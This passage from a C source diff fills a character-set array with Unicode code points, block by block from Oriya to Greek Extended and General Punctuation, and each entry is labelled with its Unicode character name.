+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
